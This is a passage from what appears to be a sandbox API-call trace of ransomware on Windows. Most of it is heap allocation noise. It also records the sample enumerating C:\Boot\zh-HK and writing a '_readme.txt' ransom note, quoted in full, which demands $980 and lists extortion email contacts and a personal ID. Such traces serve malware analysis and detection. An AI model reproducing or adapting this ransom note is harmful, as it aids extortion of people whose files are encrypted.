hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.780] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.781] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.781] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0165.781] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.781] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.781] PathFindFileNameW (pszPath="") returned="" [0165.781] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.781] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.781] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.781] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.781] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.781] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.782] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.782] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.782] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0165.782] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.782] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0165.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.783] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.783] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.783] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.783] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.783] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.783] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.784] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.784] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.784] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.784] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.784] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.784] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.785] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.785] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 